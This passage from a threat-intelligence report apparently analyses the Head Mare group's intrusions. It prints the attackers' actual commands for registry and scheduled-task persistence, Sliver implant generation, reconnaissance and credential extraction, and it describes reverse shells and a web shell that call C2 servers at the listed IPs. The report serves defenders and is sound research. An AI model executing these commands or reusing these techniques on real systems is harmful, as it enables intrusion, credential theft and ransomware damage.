  2864. <div id="attachment_113578" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113578" class="size-large wp-image-113578" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-1024x389.png" alt="PhantomCore C2 connection" width="1024" height="389" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-1024x389.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-300x114.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-768x292.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-921x350.png 921w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-740x281.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-737x280.png 737w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-800x304.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08.png 1247w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113578" class="wp-caption-text">PhantomCore C2 connection</p></div>
  2865. <p>We observed the following commands adding a value to the Run registry key:</p>
  2866. <table width="100%">
  2867. <tbody>
  2868. <tr>
  2869. <td style="text-align: center" width="50%"><strong>Command</strong></td>
  2870. <td style="text-align: center" width="50%"><strong>Description</strong></td>
  2871. </tr>
  2872. <tr>
  2873. <td>cmd /c &#8220;cd /d $selfpath\ &amp;&amp; reg add<br />
  2874. HKCU\Software\Microsoft\Windows\CurrentVersion<br />
  2875. \Run /v \&#8221;MicrosoftUpdateCoree\&#8221; /t REG_SZ /d<br />
  2876. \&#8221;$selfpath\$selfname.exe\ /f&#8221;</td>
  2877. <td rowspan="2">Adding a value to the Run registry key named MicrosoftUpdateCoree with content $appdata\Microsoft\Windows\srvhostt.exe (PhantomCore) with the /f parameter (no confirmation prompt)</td>
  2878. </tr>
  2879. <tr>
  2880. <td>reg add<br />
  2881. HKCU\Software\Microsoft\Windows\CurrentVersion<br />
  2882. \Run /v \&#8221;MicrosoftUpdateCoree\&#8221; /t REG_SZ /d<br />
  2883. \&#8221;$appdata\Microsoft\Windows\srvhostt.exe\&#8221; /f</td>
  2884. </tr>
  2885. <tr>
  2886. <td>reg add<br />
  2887. HKCU\Software\Microsoft\Windows\CurrentVersion<br />
  2888. \Run /v \&#8221;MicrosoftUpdateCore\&#8221; /t REG_SZ /d<br />
  2889. \&#8221;$appdata\Microsoft\Windows\srvhost.exe\&#8221; /f</td>
  2890. <td>A similar method of adding to the registry key, but the value is named MicrosoftUpdateCore</td>
  2891. </tr>
  2892. </tbody>
  2893. </table>
  2894. <p>In some other cases, the attackers created scheduled tasks to persist in the victim&#8217;s system. The following tasks were used to launch a PhantomCore sample:</p>
  2895. <table width="100%">
  2896. <tbody>
  2897. <tr>
  2898. <td style="text-align: center" width="50%"><strong>Command</strong></td>
  2899. <td style="text-align: center" width="50%"><strong>Description</strong></td>
  2900. </tr>
  2901. <tr>
  2902. <td>schtasks /create /tn \&#8221;MicrosoftUpdateCore\&#8221;<br />
  2903. /tr \&#8221;$appdata\Microsoft\Windows\srvhost.exe\&#8221;<br />
  2904. /sc ONLOGON</td>
  2905. <td>Creates a scheduled task named MicrosoftUpdateCore that launches $appdata\Microsoft\Windows\srvhost.exe (PhantomCore) each time the user logs in</td>
  2906. </tr>
  2907. <tr>
  2908. <td>schtasks /create /tn &#8220;MicrosoftUpdateCore&#8221; /tr<br />
  2909. &#8220;$appdata\Microsoft\Windows\srvhost.exe&#8221; /sc<br />
  2910. ONLOGON /ru &#8220;SYSTEM&#8221;</td>
  2911. <td>A similar method of creating a scheduled task, but in this case, the task runs with SYSTEM privileges</td>
  2912. </tr>
  2913. </tbody>
  2914. </table>
  2915. <h3 id="detection-evasion">Detection evasion</h3>
  2916. <p>As mentioned in the previous section, the attackers create scheduled tasks and registry values named MicrosoftUpdateCore and MicrosoftUpdateCoree to disguise their activity as tasks related to Microsoft software.</p>
  2917. <p>We also found that some LockBit samples used by the group had the following names:</p>
  2918. <ul>
  2919. <li>OneDrive.exe;</li>
  2920. <li>VLC.exe.</li>
  2921. </ul>
  2922. <p>These samples were located in the C:\ProgramData directory, disguising themselves as legitimate OneDrive and VLC applications.</p>
  2923. <p>In general, many of the tools used by Head Mare had names typical of legitimate programs and were located in standard paths or lookalikes:</p>
  2924. <table width="100%">
  2925. <tbody>
  2926. <tr>
  2927. <td width="15%"><strong>Software</strong></td>
  2928. <td width="85%"><strong>Path</strong></td>
  2929. </tr>
  2930. <tr>
  2931. <td>Sliver</td>
  2932. <td>C:\Windows\system32\SrvLog.exe</td>
  2933. </tr>
  2934. <tr>
  2935. <td rowspan="2">rsockstun</td>
  2936. <td>c:\Users\&lt;user&gt;\AppData\Local\microsoft\windows\srvhosts.exe</td>
  2937. </tr>
  2938. <tr>
  2939. <td>c:\Users\&lt;user&gt;\AppData\Roaming\microsoft\windows\srvhostt.exe</td>
  2940. </tr>
  2941. <tr>
  2942. <td rowspan="2">Phantom</td>
  2943. <td>c:\windows\srvhost.exe</td>
  2944. </tr>
  2945. <tr>
  2946. <td>c:\Users\&lt;user&gt;\appdata\roaming\microsoft\windows\srvhost.exe</td>
  2947. </tr>
  2948. <tr>
  2949. <td>LockBit</td>
  2950. <td>c:\ProgramData\OneDrive.exe</td>
  2951. </tr>
  2952. </tbody>
  2953. </table>
  2954. <p>As can be seen in the table, the attackers primarily attempted to disguise their samples as legitimate svchost.exe files in the C:\Windows\System32 directory.</p>
  2955. <p>The attackers also used disguise tactics in their phishing campaigns – samples of PhantomDL and PhantomCore were named to resemble business documents and had double extensions. Here are some examples we encountered:</p>
  2956. <ul>
  2957. <li>Счет-Фактура.pdf .exe</li>
  2958. <li>договор_ №367кх_от_29.04.2024_и_доп_соглашение_ртсс 022_контракт.pdf .exe</li>
  2959. <li>решение №201-5_10вэ_001-24 к пив экран-сои-2.pdf .exe</li>
  2960. <li>тз на разработку.pdf .exe</li>
  2961. <li>исходящее письмо от 29.04.2024 n 10677-020-2024.pdf .exe</li>
  2962. <li>возврат средств реквизиты.pdf .exe</li>
  2963. </ul>
  2964. <p>Additionally, all the samples of PhantomDL and PhantomCore we found were obfuscated, possibly using a popular obfuscator for Go called Garble.</p>
  2965. <h3 id="management-and-infrastructure">Management and infrastructure</h3>
  2966. <p>During our research, we discovered that the main C2 framework used by the attackers is Sliver, an open-source C2 framework designed for simulating cyberattacks and pentesting. Such frameworks are used to manage compromised systems after initial access, allowing attackers (or pentesters) to execute commands, gather data, and manage connections.</p>
  2967. <p>Sliver&#8217;s architecture includes an agent (implant) installed on compromised devices to execute commands from the server, a server for managing agents and coordinating their actions, and a client in the form of a command-line interface (CLI) for operator-server interaction. Sliver&#8217;s core functionality includes managing agents, executing commands via a command shell, creating tunnels to bypass network restrictions, and automating routine tasks with built-in scripts.</p>
  2968. <p>The Sliver implant samples we found had default configurations and were created using the following command:</p><pre class="crayon-plain-tag">generate --http [IP] --os windows --arch amd64 --format exe</pre><p>
  2969. To disguise the implants, the attackers used the popular Garble tool, which is available on GitHub.</p>
  2970. <p>The attackers also frequently used VPS/VDS servers as C2 servers. Below is a list of servers we observed in attacks:</p>
  2971. <table width="100%">
  2972. <tbody>
  2973. <tr>
  2974. <td style="text-align: left" width="34%"><strong>IP</strong></td>
  2975. <td style="text-align: left" width="33%"><strong>First detection</strong></td>
  2976. <td style="text-align: left" width="33%"><strong>ASN</strong></td>
  2977. </tr>
  2978. <tr>
  2979. <td>188.127.237[.]46</td>
  2980. <td>March 31, 2022</td>
  2981. <td>56694</td>
  2982. </tr>
  2983. <tr>
  2984. <td>45.87.246[.]169</td>
  2985. <td>June 26, 2024</td>
  2986. <td>212165</td>
  2987. </tr>
  2988. <tr>
  2989. <td>45.87.245[.]30</td>
  2990. <td>&#8211;</td>
  2991. <td>57494</td>
  2992. </tr>
  2993. <tr>
  2994. <td>185.80.91[.]107</td>
  2995. <td>July 10, 2024</td>
  2996. <td>212165</td>
  2997. </tr>
  2998. <tr>
  2999. <td>91.219.151[.]47</td>
  3000. <td>May 02, 2024</td>
  3001. <td>56694</td>
  3002. </tr>
  3003. <tr>
  3004. <td>5.252.176[.]47</td>
  3005. <td>&#8211;</td>
  3006. <td>39798</td>
  3007. </tr>
  3008. <tr>
  3009. <td>5.252.176[.]77</td>
  3010. <td>October 29, 2023</td>
  3011. <td>39798</td>
  3012. </tr>
  3013. </tbody>
  3014. </table>
  3015. <p>Various utilities used at different stages of the attacks were found on the attackers&#8217; C2 servers. The same utilities often appeared on different servers with identical file names.</p>
  3016. <div id="attachment_113579" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113579" class="size-large wp-image-113579" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-1024x426.png" alt="Analysis of Head Mare's C2 infrastructure" width="1024" height="426" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-1024x426.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-300x125.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-768x320.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-1536x639.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-841x350.png 841w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-740x308.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-673x280.png 673w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17-800x333.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142737/HeadMare-en-ru-es_17.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113579" class="wp-caption-text">Analysis of Head Mare&#8217;s C2 infrastructure</p></div>
  3017. <p>Below is a list of tools found on one of the attackers&#8217; command servers:</p>
  3018. <div id="attachment_113580" style="width: 775px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142906/HeadMare-en-ru-es_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113580" class="size-full wp-image-113580" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142906/HeadMare-en-ru-es_04.png" alt="Contents of one of the C2 server directories" width="765" height="584" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142906/HeadMare-en-ru-es_04.png 765w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142906/HeadMare-en-ru-es_04-300x229.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142906/HeadMare-en-ru-es_04-458x350.png 458w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142906/HeadMare-en-ru-es_04-740x565.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27142906/HeadMare-en-ru-es_04-367x280.png 367w" sizes="(max-width: 765px) 100vw, 765px" /></a><p id="caption-attachment-113580" class="wp-caption-text">Contents of one of the C2 server directories</p></div>
  3019. <table width="100%">
  3020. <tbody>
  3021. <tr>
  3022. <td style="text-align: center" width="25%"><strong>Utility name</strong></td>
  3023. <td style="text-align: center" width="75%"><strong>Description</strong></td>
  3024. </tr>
  3025. <tr>
  3026. <td>2000&#215;2000.php</td>
  3027. <td>PHP shell for executing commands on the server. This shell is called p0wny@shell:~# and is available on GitHub at hxxps://github[.]com/flozz/p0wny-shell.</td>
  3028. </tr>
  3029. <tr>
  3030. <td>LEGISLATIVE_COUSIN.exe</td>
  3031. <td rowspan="2">Sliver implant.<br />
  3032. Connects to 5.252.176[.]77:8888.</td>
  3033. </tr>
  3034. <tr>
  3035. <td>SOFT_KNITTING.exe</td>
  3036. </tr>
  3037. <tr>
  3038. <td>sherlock.ps1</td>
  3039. <td>PowerShell script for quickly finding vulnerabilities for local privilege escalation, available on GitHub at hxxps://github[.]com/rasta-mouse/Sherlock/tree/master.</td>
  3040. </tr>
  3041. <tr>
  3042. <td>ngrok.exe</td>
  3043. <td>ngrok utility.</td>
  3044. </tr>
  3045. <tr>
  3046. <td>reverse.exe</td>
  3047. <td>Meterpreter.<br />
  3048. Connects to 5.252.176[.]77:45098.</td>
  3049. </tr>
  3050. <tr>
  3051. <td>servicedll.exe</td>
  3052. <td>nssm utility for managing services.</td>
  3053. </tr>
  3054. <tr>
  3055. <td>sysm.elf</td>
  3056. <td>Unix reverse shell using the sys_connect function to connect to the attacker&#8217;s C2. If the connection attempt fails, the program enters sleep mode for 5 seconds using the sys_nanosleep function before trying again. Connects to 5.252.176[.]77:45098.</td>
  3057. </tr>
  3058. <tr>
  3059. <td>Xmrig*</td>
  3060. <td>XMRig miner. Not used in any attacks known to us.</td>
  3061. </tr>
  3062. </tbody>
  3063. </table>
  3064. <h3 id="pivoting">Pivoting</h3>
  3065. <p>Pivoting is a set of methods that allow an attacker to gain access to private network segments using compromised machines as intermediate nodes. For this purpose, the attackers use the ngrok and rsockstun utilities.</p>
  3066. <p>The rsockstun utility creates a reverse SOCKS5 tunnel with SSL and proxy server support. It allows a client behind a NAT or firewall to connect to a server via a secure connection and use SOCKS5 to forward traffic.</p>
  3067. <p>We analyzed the utility&#8217;s code and identified its key functions:</p>
  3068. <table width="100%">
  3069. <tbody>
  3070. <tr>
  3071. <td style="text-align: center" width="50%"><strong>Client</strong></td>
  3072. <td style="text-align: center" width="50%"><strong>Server</strong></td>
  3073. </tr>
  3074. <tr>
  3075. <td><strong>ConnectViaProxy function:</strong></p>
  3076. <ul>
  3077. <li>Establishes a connection with the server through a proxy.</li>
  3078. <li>Supports NTLM authentication for proxy servers.</li>
  3079. <li>Creates and sends requests to the proxy server and processes responses.</li>
  3080. </ul>
  3081. <p><strong>ConnectForSocks function:</strong></p>
  3082. <ul>
  3083. <li>Establishes a connection with the server via SOCKS5.</li>
  3084. <li>Establishes an SSL connection to the server.</li>
  3085. <li>Authenticates using a password.</li>
  3086. <li>Creates a Yamux session for multiplexing connections.</li>
  3087. </ul>
  3088. </td>
  3089. <td><strong>listenForSocks function:</strong></p>
  3090. <ul>
  3091. <li>Waits for client connections via SSL.</li>
  3092. <li>Verifies the existence and correctness of the connection password.</li>
  3093. <li>Creates a Yamux client session.</li>
  3094. </ul>
  3095. <p><strong>listenForClients function:</strong></p>
  3096. <ul>
  3097. <li>Waits for local client connections.</li>
  3098. <li>Opens a Yamux stream and forwards traffic between the local client and the remote server.</li>
  3099. </ul>
  3100. </td>
  3101. </tr>
  3102. </tbody>
  3103. </table>
  3104. <div id="attachment_113581" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113581" class="size-large wp-image-113581" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-1024x710.png" alt="Fragment of rsockstun code containing one of the Head Mare C2 addresses" width="1024" height="710" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-1024x710.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-300x208.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-768x532.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-505x350.png 505w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-740x513.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-404x280.png 404w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13-800x555.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143521/HeadMare-en-ru-es_13.png 1310w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113581" class="wp-caption-text">Fragment of rsockstun code containing one of the Head Mare C2 addresses</p></div>
  3105. <p>Ngrok is a cross-platform utility designed to create secure tunnels to local web servers over the internet. It allows quick and easy access to local services and applications by providing public URLs that can be used to access the server externally.</p>
  3106. <h3 id="network-exploration">Network exploration</h3>
  3107. <p>After successfully gaining a foothold on the initial node, attackers execute a series of commands to further explore the node, domain, and network environment:</p>
  3108. <table width="100%">
  3109. <tbody>
  3110. <tr>
  3111. <td style="text-align: center" width="40%"><strong>Command</strong></td>
  3112. <td style="text-align: center" width="60%"><strong>Description</strong></td>
  3113. </tr>
  3114. <tr>
  3115. <td>cmd /c &#8220;echo %USERDOMAIN%&#8221;</td>
  3116. <td>Retrieve the victim&#8217;s domain name</td>
  3117. </tr>
  3118. <tr>
  3119. <td>arp -a</td>
  3120. <td>Retrieve the ARP cache for all network interfaces on the compromised system</td>
  3121. </tr>
  3122. <tr>
  3123. <td>&#8220;cmd /c &#8220;cd /d $selfpath &amp;&amp; whoami</td>
  3124. <td>Gather information about the current user&#8217;s name and domain</td>
  3125. </tr>
  3126. <tr>
  3127. <td>cmd /c &#8220;cd /d $appdata &amp;&amp; powershell Get-ScheduledTask -TaskName &#8220;WindowsCore&#8221;</td>
  3128. <td>Search for a scheduled task named WindowsCore</td>
  3129. </tr>
  3130. </tbody>
  3131. </table>
  3132. <h3 id="credential-harvesting">Credential harvesting</h3>
  3133. <p>To collect credentials, attackers use the mimikatz utility.</p>
  3134. <p>In addition, to obtain additional credentials from the system, attackers use the console version of the XenArmor All-In-One Password Recovery Pro3 utility (XenAllPasswordPro), which can extract user credentials from registry hives.</p><pre class="crayon-plain-tag">"c:\ProgramData\update\XenAllPasswordPro.exe" -a
  3135. "c:\ProgramData\update\report.html"</pre><p>
  3136. <h3 id="end-goal-file-encryption">End goal: file encryption</h3>
  3137. <p>While studying Head Mare attacks, we discovered the use of two ransomware families:</p>
  3138. <ul>
  3139. <li>LockBit for Windows;</li>
  3140. <li>Babuk for ESXi.</li>
  3141. </ul>
  3142. <h4 id="babuk">Babuk</h4>
  3143. <p>The Babuk variant we discovered is a 64-bit build for ESXi, created using a publicly available configurator. The Trojan uses standard encryption algorithms for Babuk builds for ESXi – X25519 + SHA256 + Sosemanuk, as well as the standard extension for encrypted files, *.babyk.</p>
  3144. <div id="attachment_113583" style="width: 794px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143812/HeadMare-en-ru-es_09.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113583" class="size-full wp-image-113583" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143812/HeadMare-en-ru-es_09.png" alt="Kaspersky Threat Attribution Engine results for the found Babuk samples" width="784" height="242" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143812/HeadMare-en-ru-es_09.png 784w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143812/HeadMare-en-ru-es_09-300x93.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143812/HeadMare-en-ru-es_09-768x237.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143812/HeadMare-en-ru-es_09-740x228.png 740w" sizes="(max-width: 784px) 100vw, 784px" /></a><p id="caption-attachment-113583" class="wp-caption-text">Kaspersky Threat Attribution Engine results for the found Babuk samples</p></div>
  3145. <p>The distinctive features of the discovered Trojan are:</p>
  3146. <ul>
  3147. <li>Ability to log its activities in /tmp/locker.log.</li>
  3148. <li>Ability to destroy running virtual machines, the list of which is taken from the vm-list.txt file. This file is populated when the <pre class="crayon-plain-tag">esxcli vm process listd</pre> command is called.</li>
  3149. </ul>
  3150. <p>The Babuk sample we found encrypts files with the following extensions:</p>
  3151. <table width="100%">
  3152. <tbody>
  3153. <tr>
  3154. <td width="33%">.vmdk</td>
  3155. <td width="34%">.vmem</td>
  3156. <td width="33%">.vswp</td>
  3157. </tr>
  3158. <tr>
  3159. <td>.vmsn</td>
  3160. <td>.bak</td>
  3161. <td>.vhdx</td>
  3162. </tr>
  3163. </tbody>
  3164. </table>
  3165. <p>After encryption is complete, it leaves a ransom note. Below is an example of the note, which contains a unique identifier for the Session messenger and the message &#8220;Message us for decryption ^_^.&#8221;</p>
  3166. <div id="attachment_113584" style="width: 849px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143943/HeadMare-en-ru-es_15.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113584" class="size-full wp-image-113584" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143943/HeadMare-en-ru-es_15.png" alt="Babuk sample ransom note" width="839" height="156" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143943/HeadMare-en-ru-es_15.png 839w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143943/HeadMare-en-ru-es_15-300x56.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143943/HeadMare-en-ru-es_15-768x143.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143943/HeadMare-en-ru-es_15-740x138.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27143943/HeadMare-en-ru-es_15-800x149.png 800w" sizes="(max-width: 839px) 100vw, 839px" /></a><p id="caption-attachment-113584" class="wp-caption-text">Babuk sample ransom note</p></div>
  3167. <h4 id="lockbit">LockBit</h4>
  3168. <p>The LockBit builds we found in Head Mare attacks are identical to samples generated by the publicly available LockBit builder, which was leaked online in 2022. The attackers distributed LockBit under the following names:</p>
  3169. <ul>
  3170. <li>lb3.exe</li>
  3171. <li>lock.exe</li>
  3172. <li>OneDrive.exe</li>
  3173. <li>lockbithard.exe</li>
  3174. <li>lockbitlite.exe</li>
  3175. <li>phdays.exe</li>
  3176. <li>l.exe</li>
  3177. <li>VLC.exe</li>
  3178. </ul>
  3179. <p>The ransomware was located in the following paths:</p>
  3180. <ul>
  3181. <li>c:\Users\User\Desktop;</li>
  3182. <li>c:\ProgramData\.</li>
  3183. </ul>
  3184. <p>The attackers used two of these ransomware versions sequentially – lockbitlite.exe and then lockbithard.exe. First, they encrypted files using LockbitLite, and then additionally encrypted the output with the LockbitHard variant.</p>
  3185. <p>The configuration of these variants differed slightly.</p>
  3186. <table width="100%">
  3187. <tbody>
  3188. <tr>
  3189. <td style="text-align: left" width="50%"><strong>LockbitLite</strong></td>
  3190. <td style="text-align: left" width="50%"><strong>LockbitHard</strong></td>
  3191. </tr>
  3192. <tr>
  3193. <td>&#8220;encrypt_filename&#8221;: false,</td>
  3194. <td>&#8220;encrypt_filename&#8221;: true,</td>
  3195. </tr>
  3196. <tr>
  3197. <td>&#8220;wipe_freespace&#8221;: false,</td>
  3198. <td>&#8220;wipe_freespace&#8221;: true,</td>
  3199. </tr>
  3200. <tr>
  3201. <td>&#8220;white_folders&#8221;: &#8220;$recycle.bin;config.msi;$windows.~bt;$w<br />
  3202. indows.~ws;windows;boot&#8221;,</td>
  3203. <td>&#8220;white_folders&#8221;: &#8220;&#8221;,</td>
  3204. </tr>
  3205. </tbody>
  3206. </table>
  3207. <p>Examples of the notes from both samples, which are generated when the Trojan is created in the configurator, are presented below.</p>
  3208. <div id="attachment_113585" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113585" class="size-large wp-image-113585" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-1024x688.png" alt="Ransom note from LockBit sample" width="1024" height="688" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-1024x688.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-300x202.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-768x516.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-521x350.png 521w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-740x497.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-417x280.png 417w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05-800x538.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144313/HeadMare-en-ru-es_05.png 1159w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113585" class="wp-caption-text">Ransom note from LockBit sample</p></div>
  3209. <div id="attachment_113586" style="width: 683px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144350/HeadMare-en-ru-es_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113586" class="size-full wp-image-113586" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144350/HeadMare-en-ru-es_07.png" alt="Ransom note from another LockBit sample" width="673" height="540" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144350/HeadMare-en-ru-es_07.png 673w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144350/HeadMare-en-ru-es_07-300x241.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144350/HeadMare-en-ru-es_07-500x400.png 500w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144350/HeadMare-en-ru-es_07-436x350.png 436w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144350/HeadMare-en-ru-es_07-349x280.png 349w" sizes="(max-width: 673px) 100vw, 673px" /></a><p id="caption-attachment-113586" class="wp-caption-text">Ransom note from another LockBit sample</p></div>
  3210. <h2 id="victimology">Victimology</h2>
  3211. <p>According to Kaspersky Threat Intelligence, all samples related to Head Mare were detected only in Russia and Belarus. The screenshot below shows the analysis of the PhantomDL sample on the Threat Intelligence Portal.</p>
  3212. <div id="attachment_113587" style="width: 943px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113587" class="size-full wp-image-113587" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map.png" alt="Information about the PhantomDL sample from TIP" width="933" height="614" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map.png 933w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map-300x197.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map-768x505.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map-532x350.png 532w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map-740x487.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map-425x280.png 425w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27144500/Head_Mare_map-800x526.png 800w" sizes="(max-width: 933px) 100vw, 933px" /></a><p id="caption-attachment-113587" class="wp-caption-text">Information about the PhantomDL sample from TIP</p></div>
  3213. <h2 id="samples-similar-to-head-mares-toolkit">Samples similar to Head Mare&#8217;s toolkit</h2>
  3214. <p>To get a more complete picture, we analyzed samples seen in Head Mare attacks using the <a href="https://www.kaspersky.com/enterprise-security/threat-analysis%23similarity" target="_blank" rel="noopener">Similarity technology</a>, which helps us find similar malware samples. While we can&#8217;t say for certain that the discovered files were also used by Head Mare, their similarity may help in attributing cyberattacks and further analyzing the group&#8217;s activities.</p>
  3215. <h3 id="phantomdl">PhantomDL</h3>
  3216. <table width="100%">
  3217. <tbody>
  3218. <tr>
  3219. <td width="50%"><strong>MD5 of the original sample</strong></td>
